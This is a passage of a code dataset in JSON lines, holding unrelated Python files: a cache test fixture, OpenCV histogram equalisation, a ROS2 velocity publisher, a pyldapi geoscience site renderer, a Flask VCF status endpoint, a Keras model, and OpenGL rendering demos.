default=str)) == val\n\n val = self.__cache.retrieve(None, KEY4)\n assert val is not None\n assert len(val) == 4\n assert VALUE4[0] == val[0]\n\n val = self.__cache.retrieve(None, KEY5)\n assert val is not None\n assert VALUE5 == val\n\n val = self.__cache.retrieve(None, KEY6)\n assert val is None\n\n def test_retrieve_expired(self):\n self.__cache.store(None, KEY1, VALUE1, 1000)\n\n time.sleep(1.5)\n\n val = self.__cache.retrieve(None, KEY1)\n\n assert val is None\n\n def test_remove(self):\n self.__cache.store(None, KEY1, VALUE1, 1000)\n\n self.__cache.remove(None, KEY1)\n\n val = self.__cache.retrieve(None, KEY1)\n\n assert val is None\n","sub_path":"test/fixtures/CacheFixture.py","file_name":"CacheFixture.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619288497","text":"import cv2\nfrom matplotlib import pyplot as plt\nfrom enchant.checker.CmdLineChecker import color\n\nimg = cv2.imread(\"dataset/examples/life-of-brian2.jpg\", cv2.IMREAD_GRAYSCALE)\ncv2.imshow('Always look on the bright side of life', img)\ncv2.waitKey(0)\nhist = cv2.calcHist([img], [0], None, [256], [0, 256])\nplt.plot(hist, color='gray')\n\nimgeq = cv2.equalizeHist(img)\ncv2.imshow('Equalized', imgeq)\ncv2.waitKey(0)\nhist1 = cv2.calcHist([imgeq], [0], None, [256], [0, 256])\nplt.plot(hist1, color='gray')\n\nplt.xlabel('intensidad de iluminacion')\nplt.ylabel('cantidad de pixeles')\nplt.show()\n\ncv2.destroyAllWindows()\n","sub_path":"tip_01_02_a.py","file_name":"tip_01_02_a.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68968","text":"import rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\n\n\nclass CmdVelPublisher(Node):\n def __init__(self):\n super().__init__('cmd_vel_publisher')\n self.publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)\n self.msg = Twist()\n self.max_lin = 0.25\n self.max_ang = 1.0\n self.stop_flag = False\n\n def publish_vel(self, vel):\n y = -float(vel['y'])\n x = -float(vel['x'])\n if (y == x == 0.0):\n if not self.stop_flag:\n self.stop_flag = True\n for _ in range(10):\n self.msg.linear.x = y*self.max_lin\n self.msg.angular.z = x*self.max_ang\n self.publisher_.publish(self.msg)\n else:\n return\n else:\n self.stop_flag = False\n self.msg.linear.x = y*self.max_lin\n self.msg.angular.z = x*self.max_ang\n self.publisher_.publish(self.msg)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n minimal_publisher = 
CmdVelPublisher()\n\n rclpy.spin(minimal_publisher)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n minimal_publisher.destroy_node()\n rclpy.shutdown()","sub_path":"cmd_vel_joy/cmd_vel_joy/cmd_vel_node.py","file_name":"cmd_vel_node.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"233581078","text":"from pyldapi import Renderer, View\nimport requests\nfrom flask import Response, render_template\nfrom lxml import etree\nfrom lxml import objectify\nfrom rdflib import Graph, URIRef, RDF, RDFS, XSD, OWL, Namespace, Literal, BNode\nimport _config as config\nfrom datetime import datetime\nimport json\njson.encoder.FLOAT_REPR = lambda f: (\"%.2f\" % f)\n\n\nclass SiteRenderer(Renderer):\n URI_GA = 'http://pid.geoscience.gov.au/org/ga/geoscienceausralia'\n\n def __init__(self, request, xml=None):\n views = {\n \"pdm\": View(\n \"GA's Public Data Model View\",\n \"Geoscience Australia's Public Data Model ontology\",\n [\"text/html\", \"text/turtle\", \"application/rdf+xml\", \"application/rdf+json\"],\n 'text/html',\n namespace='http://pid.geoscience.gov.au/def/ont/ga/pdm'\n ),\n\n \"nemsr\": View(\n \"The National Environmental Monitoring Sites Register View\",\n \"The National Environmental Monitoring Sites Register\",\n [\"application/vnd.geo+json\"],\n \"application/vnd.geo+json\",\n namespace=\"http://www.neii.gov.au/nemsr\"\n )\n }\n\n self.site_no = request.base_url.split('/')[-1]\n\n super(SiteRenderer, self).__init__(request, config.URI_SITE_INSTANCE_BASE + self.site_no, views, 'pdm')\n\n self.site_type = None\n self.description = None\n self.status = None\n self.entry_date = None\n self.geometry_type = None\n self.centroid_x = None\n self.centroid_y = None\n self.coords = None\n self.not_found = False\n\n if xml is not None: # even if there are values for Oracle API URI and IGSN, load from XML file if present\n self._populate_from_xml_file(xml)\n else:\n self._populate_from_oracle_api()\n\n def validate_xml(self, xml):\n parser = etree.XMLParser(dtd_validation=False)\n\n try:\n etree.fromstring(xml, parser)\n return True\n except Exception:\n print('not valid xml')\n return False\n\n def _make_vocab_uri(self, xml_value, vocab_type):\n from model.lookups import TERM_LOOKUP\n if TERM_LOOKUP[vocab_type].get(xml_value) is not None:\n return TERM_LOOKUP[vocab_type].get(xml_value)\n else:\n return TERM_LOOKUP[vocab_type].get('unknown')\n\n def _make_vocab_alink(self, vocab_uri):\n if vocab_uri is not None:\n if vocab_uri.endswith('/'):\n return '<a href=\"{}\">{}</a>'.format(vocab_uri, vocab_uri.split('/')[-2])\n else:\n return '<a href=\"{}\">{}</a>'.format(vocab_uri, vocab_uri.split('/')[-1])\n\n def _generate_wkt(self):\n \"\"\"\n Polygon: 8\n Point: 6889\n :return:\n :rtype:\n \"\"\"\n if self.geometry_type == 'Point':\n coordinates = {\n 'srid': 'GDA94',\n 'x': self.x,\n 'y': self.y\n }\n wkt = 'SRID={srid};POINT({x} {y})'.format(**coordinates)\n elif self.geometry_type == 'Polygon':\n start = 'SRID={srid};POLYGON(('.format(srid='GDA94')\n coordinates = ''\n for coord in zip(self.lons, self.lats):\n coordinates += '{} {},'.format(coord[0], coord[1])\n\n coordinates = coordinates[:-1] # drop the final ','\n end = '))'\n wkt = '{start}{coordinates}{end}'.format(start=start, coordinates=coordinates, end=end)\n else:\n wkt = ''\n\n return wkt\n\n def _generate_google_map_js(self):\n if self.geometry_type == 'Point':\n js = '''\n var 
map = new google.maps.Map(document.getElementById(\"map\"), {\n zoom: 6,\n center: myLatLng\n });\n\n var marker = new google.maps.Marker({\n position: myLatLng,\n map: map,\n title: 'Site %s'\n });\n ''' % self.site_no\n elif self.geometry_type == 'Polygon':\n coords = []\n for coord in zip(self.lons, self.lats):\n coords.append('\\t\\t\\t\\tnew google.maps.LatLng(%06.8f, %06.8f)' % (coord[1], coord[0]))\n # add the last first coordinate pair to end for complete polygon\n coords.append('\\t\\t\\t\\tnew google.maps.LatLng(%06.8f, %06.8f)' % (self.lats[0], self.lons[0]))\n js = '''\n var map = new google.maps.Map(document.getElementById(\"map\"), {\n zoom: 4,\n center: myLatLng\n });\n\n var bboxCoords = new Array(\n%s\n );\n // Construct the polygon.\n var bbox = new google.maps.Polygon({\n paths: bboxCoords,\n strokeColor: '#FF0000',\n strokeOpacity: 0.8,\n strokeWeight: 2,\n fillColor: '#FF0000',\n fillOpacity: 0.35\n });\n\n bbox.setMap(map);\n\n var bounds = new google.maps.LatLngBounds(); \n for (var i=0; i a , ;\n samfl:samplingElevation [ a samfl:Elevation ;\n samfl:elevation \"231.69716\"^^xsd:float ;\n samfl:verticalDatum \"http://spatialreference.org/ref/epsg/4283/\"^^xsd:anyUri ] ;\n geosp:hasGeometry [ \n a geosp:Geometry ;\n geosp:asWKT \"SRID=GDA94;POINT(143.36786389 -25.94903611)\"^^geosp:wktLiteral \n ] .\n\n a sosa:FeatureOfInterest ;\n skos:exactMatch .\n\n rdfs:subClassOf sosa:Sample .\n '''\n # things that are applicable to all model views; the graph and some namespaces\n g = Graph()\n GEO = Namespace('http://www.opengis.net/ont/geosparql#')\n g.bind('geo', GEO)\n\n # URI for this site\n this_site = URIRef(config.URI_SITE_INSTANCE_BASE + self.site_no)\n g.add((this_site, RDF.type, URIRef(self.site_type)))\n g.add((this_site, RDF.type, URIRef('http://www.w3.org/2002/07/owl#NamedIndividual')))\n g.add((this_site, RDFS.label, Literal('Site ' + self.site_no, datatype=XSD.string)))\n g.add((this_site, RDFS.comment, Literal(self.description, datatype=XSD.string)))\n site_geometry = BNode()\n g.add((this_site, GEO.hasGeometry, site_geometry))\n g.add((site_geometry, RDF.type, GEO.Geometry))\n g.add((site_geometry, GEO.asWKT, Literal(self._generate_wkt(), datatype=GEO.wktLiteral)))\n\n return g.serialize(format=self._get_rdf_mimetype(rdf_mime))\n\n def _get_rdf_mimetype(self, rdf_mime):\n return self.RDF_SERIALIZER_MAP[rdf_mime]\n\n def export_html(self, model_view='pdm'):\n \"\"\"\n Exports this instance in HTML, according to a given model from the list of supported models.\n\n :param model_view: string of one of the model view names available for Sample objects ['igsn', 'dc', '',\n 'default']\n :return: HTML string\n \"\"\"\n if model_view == 'pdm':\n view_title = 'PDM Ontology view'\n sample_table_html = render_template(\n 'class_site_pdm.html',\n site_no=self.site_no,\n description=self.description,\n wkt=self._generate_wkt(),\n state=None, # TODO: calculate\n site_type_alink=self._make_vocab_alink(self.site_type),\n entry_date=self.entry_date\n )\n elif model_view == 'prov':\n view_title = 'PROV Ontology view'\n prov_turtle = self.export_rdf('prov', 'text/turtle')\n g = Graph().parse(data=prov_turtle, format='turtle')\n\n sample_table_html = render_template(\n 'class_site_prov.html',\n visjs=self._make_vsjs(g),\n prov_turtle=prov_turtle,\n )\n else: # elif model_view == 'dc':\n view_title = 'Dublin Core view'\n\n sample_table_html = render_template(\n 'class_site_dc.html',\n identifier=self.site_no,\n description=self.description,\n date=self.entry_date,\n 
type=self.site_type,\n wkt=self._generate_wkt(),\n creator='Geoscience Australia'.format(self.URI_GA),\n publisher='Geoscience Australia'.format(self.URI_GA),\n )\n\n # add in the Pingback header links as they are valid for all HTML views\n pingback_uri = config.URI_SITE_INSTANCE_BASE + self.site_no + \"/pingback\"\n headers = {\n 'Link': '<{}>;rel = \"http://www.w3.org/ns/prov#pingback\"'.format(pingback_uri)\n }\n\n return Response(\n render_template(\n 'page_site.html',\n view=model_view,\n site_no=self.site_no,\n entry_date=self.entry_date,\n view_title=view_title,\n sample_table_html=sample_table_html,\n date_now=datetime.now().strftime('%d %B %Y'),\n gm_key=config.GOOGLE_MAPS_API_KEY,\n google_maps_js=self._generate_google_map_js(),\n lat=self.centroid_y,\n lon=self.centroid_x,\n geometry_type=self.geometry_type,\n coords=self.coords\n ),\n headers=headers\n )\n\n\nclass ParameterError(ValueError):\n pass\n\n\nif __name__ == '__main__':\n # s = Site(17943)\n # s._populate_from_oracle_api()\n # print(s.export_nemsr_geojson())\n pass\n","sub_path":"model/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":18090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48737760","text":"from globals import Globals\nfrom flask_restplus import Resource, Namespace\nfrom flask import jsonify\nimport os\nimport logging\n\napi = Namespace('vcf', description=\"Status for VCF file conversion\")\n\n\n@api.route('/status')\n@api.doc(description=\"Status of VCF file\")\nclass Download(Resource):\n parser = api.parser()\n parser.add_argument('job_id', type=str, required=True, help=\"Job identifier\")\n\n @api.expect(parser)\n def get(self):\n args = self.parser.parse_args()\n\n job_dir = os.path.join(Globals.UPLOAD_FOLDER, args['job_id'])\n logging.info(\"Looking for data in: {}\".format(job_dir))\n filename = \"{}.vcf.gz\".format(args['job_id'])\n logging.info(\"Looking for completed filename in: {}\".format(filename))\n\n # check job dir is valid\n if not os.path.isdir(job_dir):\n logging.error(\"Directory does not exist, check UUID\")\n return \"Job {} does not exist on server\".format(args['job_id']), 404\n\n # check output file is ready for download\n if not os.path.exists(os.path.join(job_dir, filename)):\n logging.info(\"No outputs available. Result are processing or failed\")\n return jsonify(message=\"Job {} is not complete. 
Please check back later, a job will take at least 30-60 minutes depending on load and GWAS genotype density.\".format(args['job_id']))\n\n return jsonify(message=\"Job {} is complete.\".format(args['job_id']),\n vcf_uri=\"/vcf/download?job_id=\" + args['job_id'] + \"&file_type=vcf\",\n tbi_uri=\"/vcf/download?job_id=\" + args['job_id'] + \"&file_type=tbi\")\n","sub_path":"app/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"609602385","text":"from keras.layers import Conv2D, AveragePooling2D, MaxPooling2D, SeparableConv2D\nfrom keras.layers import Dense, BatchNormalization, Dropout, Activation, regularizers\nfrom keras.layers.merge import concatenate\nimport keras as k\nimport tensorflow as tf\n#一个666的模型\nclass my_alex(object):\n def __init__(self, x):\n self.x = x\n self.init = k.initializers.glorot_normal()\n self.regular = regularizers.l1_l2(l1=0.1, l2=0.5)\n self.trainable1 = True\n self.trainable2 = True\n def predict(self):\n net1 = Conv2D(64, (7, 7), padding='same', strides=[2, 2],\n kernel_initializer=self.init, activation='relu', trainable=self.trainable1)(self.x)\n net1 = block(x=net1, f=64, init=self.init, trainable=self.trainable1)\n net2 = Conv2D(128, (3, 3), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=self.init, trainable=self.trainable1)(net1)\n net2 = MaxPooling2D((3, 3), strides=(2, 2), trainable=self.trainable1)(net2)\n net2 = block(x=net2, f=128, init=self.init, trainable=self.trainable1)\n net2 = block(x=net2, f=128, init=self.init, trainable=self.trainable1)\n net3 = Conv2D(256, (3, 3), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=self.init, trainable=self.trainable1)(net2)\n net3 = MaxPooling2D((3, 3), strides=(2, 2))(net3)\n net3 = block(x=net3, f=256, init=self.init, trainable=self.trainable2)\n net3 = block(x=net3, f=256, init=self.init, trainable=self.trainable2)\n net4 = MaxPooling2D((3, 3), strides=(2, 2))(net3)\n net4 = Conv2D(256, (3, 3), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=self.init, trainable=self.trainable2)(net4)\n net4 = block(x=net4, f=256, init=self.init, trainable=self.trainable2)\n net5 = tf.reshape(net4, [-1, 7*2*256])\n net_m = Dense(4096, activation='tanh', trainable=self.trainable2)(net5)\n net_s = Dense(128, trainable=self.trainable2)(net_m)\n return net_s, net_m\ndef block(x, f, init,trainable):\n b1 = SeparableConv2D(filters=f, kernel_size=(3, 3), padding='same', depth_multiplier=1)(x)\n b1 = Conv2D(f, (1, 1), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=init, trainable=trainable)(b1)\n b2 = SeparableConv2D(filters=f, kernel_size=(3, 3), padding='same', depth_multiplier=1)(b1)\n b2 = Conv2D(f, (1, 1), padding='same', strides=[1, 1], activation='relu',\n kernel_initializer=init, trainable=trainable)(b2)\n b3 = b2+x\n return b3\n","sub_path":"zjc_footnet.py","file_name":"zjc_footnet.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186292587","text":"import glnext\nfrom glnext_compiler import glsl\nfrom objloader import Obj\nfrom PIL import Image\n\ninstance = glnext.instance()\ntask = instance.task()\n\nframebuffer = task.framebuffer((512, 512))\n\nuniform_buffer = instance.buffer('uniform_buffer', 64)\n\npipeline = framebuffer.render(\n vertex_shader=glsl('''\n #version 450\n #pragma 
shader_stage(vertex)\n\n layout (binding = 0) uniform Buffer {\n mat4 mvp;\n };\n\n layout (location = 0) in vec3 in_vert;\n layout (location = 1) in vec3 in_norm;\n\n layout (location = 0) out vec3 out_norm;\n\n void main() {\n gl_Position = mvp * vec4(in_vert, 1.0);\n out_norm = in_norm;\n }\n '''),\n fragment_shader=glsl('''\n #version 450\n #pragma shader_stage(fragment)\n\n layout (binding = 0) uniform Buffer {\n mat4 mvp;\n };\n\n layout (location = 0) in vec3 in_norm;\n\n layout (location = 0) out vec4 out_color;\n\n void main() {\n vec3 color = vec3(1.0, 1.0, 1.0);\n vec3 sight = -vec3(mvp[0].w, mvp[1].w, mvp[2].w);\n float lum = dot(normalize(sight), normalize(in_norm)) * 0.7 + 0.3;\n out_color = vec4(lum, lum, lum, 1.0);\n }\n '''),\n vertex_format='3f 3f',\n vertex_count=36,\n bindings=[\n {\n 'binding': 0,\n 'type': 'uniform_buffer',\n 'buffer': uniform_buffer,\n },\n ],\n)\n\nuniform_buffer.write(glnext.camera((4.0, 3.0, 2.0), (0.0, 0.0, 0.0)))\n\npipeline.update(\n vertex_buffer=Obj.open('examples/cube.obj').pack('vx vy vz nx ny nz'),\n)\n\ntask.run()\ndata = framebuffer.output[0].read()\nImage.frombuffer('RGBA', (512, 512), data, 'raw', 'RGBA', 0, -1).show()\n","sub_path":"examples/external_uniform_buffer.py","file_name":"external_uniform_buffer.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244092533","text":"\"\"\"\nSHRISTIKA YADAV\n\"\"\"\nimport sys\n\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom numpy import array, arange\nfrom lamp import teapot\nfrom quad import quad\nfrom ball import ball\nfrom shaderSetup import shaderSetup\nfrom viewParams import viewParams\nfrom textures import *\nfrom lighting import *\nfrom simpleShape import *\nfrom bufferSet import *\n\nclass textingMain (object) :\n # rotation control\n anglesReset = [30.0, 30.0, 0.0]\n angles = [30.0, 30.0, 0.0]\n angleInc = 5.0\n viewMode = 1\n cameraNum = 1\n\n # our viewparams\n view = viewParams ()\n\n # lighting and textures\n tex = textures ()\n light = lighting()\n\n # dimensions of the drawing window\n w_width = 1000\n w_height = 1000\n\n # buffer information\n quadBuffers = bufferSet(None) # floor\n teapotBuffers = bufferSet(None) # lamp\n houseBuffers = bufferSet(None) #ball\n\n # animation flag\n animating = False\n\n # initial rotations\n rotQuad = 0.0\n rotTeapot = 0.0\n rothouse = 0.0\n\n # program IDs...for program and parameters\n pshader = GLuint (0)\n tshader = GLuint (0)\n hshader = GLuint(0)\n\n # vertex array object\n qVao = GLuint(0)\n tVao = GLuint(0)\n hVao = GLuint(0)\n\n\n #\n # initialization\n #\n def init (self):\n\n # Load your textures\n self.tex.loadTexture()\n\n # Load shaders and verify each\n myShaders = shaderSetup(None)\n self.tshader = myShaders.readAndCompile(\"texture.vert\", \"texture.frag\")\n if self.tshader <= 0:\n print (\"Error setting up Texture shaders\")\n raise Exception(\"Error setting up Texture Shaders\", \"fatal\")\n sys.exit(1)\n\n self.pshader = myShaders.readAndCompile(\"phong.vert\", \"phong.frag\")\n if self.pshader <= 0:\n print (\"Error setting up Phong shaders\")\n raise Exception(\"Error setting up Phong Shaders\", \"fatal\")\n sys.exit(1)\n\n self.hshader = myShaders.readAndCompile(\"phong.vert\", \"phong.frag\")\n if self.hshader <= 0:\n print (\"Error setting up Phong shaders\")\n raise Exception(\"Error setting up Phong Shaders\", \"fatal\")\n sys.exit(1)\n\n # Other OpenGL initialization\n glEnable( GL_DEPTH_TEST )\n 
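# black clear colour, filled polygons, depth buffer cleared to the far plane\n 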
glClearColor( 0.0, 0.0, 0.0, 0.0 )\n glPolygonMode( GL_FRONT_AND_BACK, GL_FILL )\n glClearDepth( 1.0 )\n\n # create teapot(lamp)\n myShape = teapot()\n myShape.clear()\n myShape.makeTeapot()\n self.tVao = self.createVAO(myShape, self.pshader, self.teapotBuffers )\n\n # create quad\n myShape = quad ()\n myShape.clear()\n myShape.makeQuad()\n self.qVao = self.createVAO(myShape, self.tshader, self.quadBuffers )\n\n # create Ball(house)\n myShape = ball()\n myShape.clear()\n myShape.makeBall()\n self.hVao = self.createVAO(myShape, self.hshader, self.houseBuffers)\n\n\n '''\n * Creates VAO for given set of objects. Returns the VAO ID\n '''\n def createVAO (self, shape, program, B) :\n\n # Get yourself an ID\n vaoID = GLuint(0)\n glGenVertexArrays(1, vaoID)\n\n # You'll need the correct program to get the location of the vertex\n # attributes\n glUseProgram(program)\n\n # Bind the vertex array object\n glBindVertexArray (vaoID)\n\n # Make and fill your buffer\n # create the buffers\n B.createBuffers (shape)\n\n # set buffers to correct vertext attribute\n vPosition = glGetAttribLocation(program,\"vPosition\")\n glEnableVertexAttribArray(vPosition)\n glBindBuffer (GL_ARRAY_BUFFER, B.vbuffer);\n glVertexAttribPointer(vPosition,4,GL_FLOAT,GL_FALSE,0,ctypes.c_void_p(0))\n\n # color data\n if( B.cSize > 0) :\n vColor = glGetAttribLocation( program, \"vColor\" )\n glEnableVertexAttribArray( vColor )\n glBindBuffer (GL_ARRAY_BUFFER, B.cbuffer);\n glVertexAttribPointer( vColor, 4, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p (0))\n\n\n # normal data\n if( B.nSize > 0 ) :\n vNormal = 0#glGetAttribLocation( program, \"vNormal\" )\n glEnableVertexAttribArray( vNormal )\n glBindBuffer (GL_ARRAY_BUFFER, B.nbuffer);\n glVertexAttribPointer( vNormal, 3, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p (0))\n\n # texture coord data\n if( B.tSize > 0 ) :\n vTexCoord = 0 #glGetAttribLocation( program, \"vTexCoord\" )\n glEnableVertexAttribArray( vTexCoord );\n glBindBuffer (GL_ARRAY_BUFFER, B.tbuffer);\n glVertexAttribPointer( vTexCoord, 2, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p (0))\n\n # return your ID\n return vaoID\n\n #\n # keyboard function\n #\n def keyPressed(self,*args):\n\n #Get the key that was pressed\n key = str(args[0].decode())\n\n # ==============================================\n # view mode\n if (key == '1'):\n self.viewMode = 1\n # self.updateDisplay = True\n elif (key == '2'):\n self.viewMode = 2;\n # self.updateDisplay = True\n else:\n self.viewMode = 1;\n\n # ==============================================\n\n\n # animate\n if(key == 'a'):\n self.animating = True\n\n # stop animating\n elif (key == 's') :\n self.animating = False\n\n # reset rotations\n elif (key == 'r') :\n self.rotTeapot = 0.0\n self.rothouse = 0.0\n self.rotQuad = 0.0\n self.display()\n elif (key == 'x'):\n self.cameraNum = 1\n elif (key == 'k'):\n self.cameraNum = 2\n elif (key == 'l'):\n self.cameraNum = 3\n else:\n self.cameraNum = 1\n\n # quit\n if(key == 'q' or key == 'Q'):\n sys.exit()\n elif(args[0] == '\\033'): #Escape character\n sys.exit()\n\n # Animate the objects (maybe)\n def animate( self ) :\n if( self.animating ) :\n self.rotTeapot = self.rotTeapot + 0.5 #(speed)\n self.rotQuad = self.rotQuad + 0.5\n self.rothouse = self.rothouse + 0.5\n self.display()\n pass\n\n\n\n # bind the correct vertex and element buffere\n def selectBuffers(self, program, B):\n # bind the buffers\n glBindVertexArray(self.vaoID)\n glBindBuffer(GL_ARRAY_BUFFER, B.vbuffer)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, B.ebuffer)\n\n # set up the vertex 
attribute variables\n glEnableVertexAttribArray(self.vPosition)\n glVertexAttribPointer(self.vPosition, 4, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p(0))\n\n # send down our rotation angles\n glUniform3fv(self.theta, 1, self.angles)\n\n\n\n #\n # display function\n #\n def display( self ) :\n\n # clear the frame buffer\n glClear( GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n\n\n\n # first the quad\n glUseProgram (self.tshader)\n\n # set up viewing and projection parameters\n self.view.setUpFrustum( self.tshader )\n\n # set up the texture information\n self.tex.setUpTexture( self.tshader )\n\n # set up the camera\n # self.view.setUpCamera( self.tshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0 )\n\n # set up the camera\n if self.cameraNum == 1:\n self.view.setUpCamera( self.tshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n elif self.cameraNum == 2:\n self.view.setUpCamera(self.tshader, 0.0, 8.0, 2.5, 0.0, 2.0, -0.7, 0.0, 1.0, 0.0)\n else:\n self.view.setUpCamera(self.tshader, -0.5, 1.0, 7.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n\n # set up transformations for the quad\n self.view.setUpTransforms( self.tshader, 0.75, 0.75, 0.75, 0.0, self.rotQuad, 0.0, -1.25, -0.25, -2.0)\n\n # draw it\n glBindVertexArray (self.qVao)\n glDrawArrays(GL_TRIANGLES, 0, self.quadBuffers.numElements)\n\n # -------------------------------------------------------\n\n # now the lamp (teapot)\n glUseProgram( self.pshader )\n\n # -------------------------------------------------------\n\n if (self.viewMode == 1):\n self.view.setUpFrustum(self.pshader)\n\n elif (self.viewMode == 2):\n self.view.setUpOrtho(self.pshader)\n else:\n self.view.setUpFrustum(self.pshader)\n\n # ==========================================================================\n\n # set up viewing and projection parameters\n # self.view.setUpFrustum( self.pshader )\n\n # set up the Phong shading information\n self.light.setUpPhong( self.pshader )\n\n # set up the camera\n if self.cameraNum == 1:\n self.view.setUpCamera( self.pshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n elif self.cameraNum == 2:\n self.view.setUpCamera(self.pshader, 0.0, 8.0, 2.5, 0.0, 2.0, -0.7, 0.0, 1.0, 0.0)\n else:\n self.view.setUpCamera(self.pshader, -0.5, 1.0, 7.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n\n # set up transforms\n self.view.setUpTransforms( self.pshader, 0.3, 0.3, 0.3, 0.0, self.rotTeapot, 0.0, 1.5, 0.5, -1.5 )\n\n # draw it\n glBindVertexArray (self.tVao)\n glDrawArrays(GL_TRIANGLES, 0, self.teapotBuffers.numElements)\n\n\n\n # -------------------------------------------------------\n\n\n # # now the ball (house)\n glUseProgram(self.hshader)\n\n\n # -------------------------------------------------------\n\n if (self.viewMode == 1):\n self.view.setUpFrustum(self.hshader)\n elif (self.viewMode == 2):\n self.view.setUpOrtho(self.hshader)\n else:\n self.view.setUpFrustum(self.hshader)\n\n # ==========================================================================\n\n # set up viewing and projection parameters\n # self.view.setUpFrustum(self.hshader)\n\n # set up the Phong shading information\n self.light.setUpPhong(self.hshader)\n\n # set up the camera\n # self.view.setUpCamera(self.hshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n\n # set up the camera\n if self.cameraNum == 1:\n self.view.setUpCamera( self.hshader, 0.2, 3.0, 6.5, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0)\n elif self.cameraNum == 2:\n self.view.setUpCamera(self.hshader, 0.0, 8.0, 2.5, 0.0, 2.0, -0.7, 0.0, 1.0, 0.0)\n else:\n self.view.setUpCamera(self.hshader, -0.5, 1.0, 7.5, 0.0, 1.0, 0.0, 0.0, 
1.0, 0.0)\n\n # set up transforms\n self.view.setUpTransforms(self.hshader, 0.3, 0.3, 0.3, 0.0, self.rothouse, 0.0, 1.5, 0.5, -1.5)\n\n # draw it\n glBindVertexArray(self.hVao)\n glDrawArrays(GL_TRIANGLES, 0,self.houseBuffers.numElements)\n\n # Swap the buffers\n glutSwapBuffers()\n\n\n\n\n # main function\n def main(self):\n\n glutInit()\n glutInitDisplayMode(GLUT_RGBA|GLUT_ALPHA|GLUT_DOUBLE|GLUT_DEPTH|GLUT_3_2_CORE_PROFILE)\n glutInitWindowSize(1000,1000)\n glutCreateWindow(b\"Transformation Demo\")\n\n self.init()\n glutDisplayFunc(self.display)\n glutIdleFunc(self.animate)\n glutKeyboardFunc(self.keyPressed)\n\n glutMainLoop()\n\n self.dispose()\n\n\nif __name__ == '__main__':\n textingMain().main()\n\n","sub_path":"textingMain.py","file_name":"textingMain.py","file_ext":"py","file_size_in_byte":11402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"229821981","text":"#!/bin/python\n\n\"\"\"\nlesson2.py\n\nThis script implements the key points from the Lesson 2 exercises, expressed in the lesson2.pydb Jupyter Notebook.\n\nUsage:\n lesson2.py [options] [command-options] \n\nWhere:\n commands:\n train Train and/or fine-tune the model using training/validation data in the data-folder.\n options:\n --batch-size\n --epochs\n --learn-rate\n\n predict Use a trained model to predict the image classes from test data in the data-folder.\n\n options:\n --cache Load data from local data files from previous runs to speed processing.\n --weights Load model weights from file.\n --test Just go through the motions, don't actually do anything.\n\nExample:\n lesson2.py --data --cache train\n lesson2.py --data --weights predict\n\n\"\"\"\n\nimport os\nimport random\nimport shutil\nimport fnmatch\n\nimport click\n\n\nTRAIN_FOLDER = 'train'\nVALID_FOLDER = 'valid'\nTEST_FOLDER = 'test'\nSAMPLE_FOLDER = 'sample'\nMODEL_FOLDER = 'model'\n\nTEST_ONLY = False\nCLASSES = [\n # (filename, foldername),\n ('dog', 'dogs'),\n ('cat', 'cats')\n]\n\n\n@click.group()\n@click.option('--cache', is_flag=True, help='Load data from local data files from previous runs to speed processing.')\n@click.option('--weights', is_flag=True, help='Load data from local data files from previous runs to speed processing.')\n@click.option('--test', is_flag=True, help='Show what will happen, but don\\'t actually do it.')\ndef cli(test):\n '''Root (pseudo) command'''\n global TEST_ONLY\n TEST_ONLY = test\n if TEST_ONLY:\n click.echo('Running in TEST MODE; no changes will be made.')\n\n\n@cli.command(help='Train and/or fine-tune the model using training/validation data in the data-folder.')\n@click.argument('data-folder')\ndef train(folder):\n '''\n Trains and/or fine-tunes the vgg16 model to recognize dog or cat images only.\n\n The given folder must contain the following sub-folders:\n train/\n test/\n valid/\n\n Arguments:\n\n folder -- The root folder of the training, test, and validation data sets.\n '''\n folder_path = os.path.normpath(folder)\n\n click.echo('Validating data folder %s' % (folder_path,))\n\n validateFolder(folder_path)\n validateFolder(os.path.join(folder_path, TRAIN_FOLDER))\n validateFolder(os.path.join(folder_path, VALID_FOLDER))\n validateFolder(os.path.join(folder_path, TEST_FOLDER))\n\n click.echo('Training the model using data from %s' % (folder_path,))\n\n click.echo('Finished training the model using data from %s.' 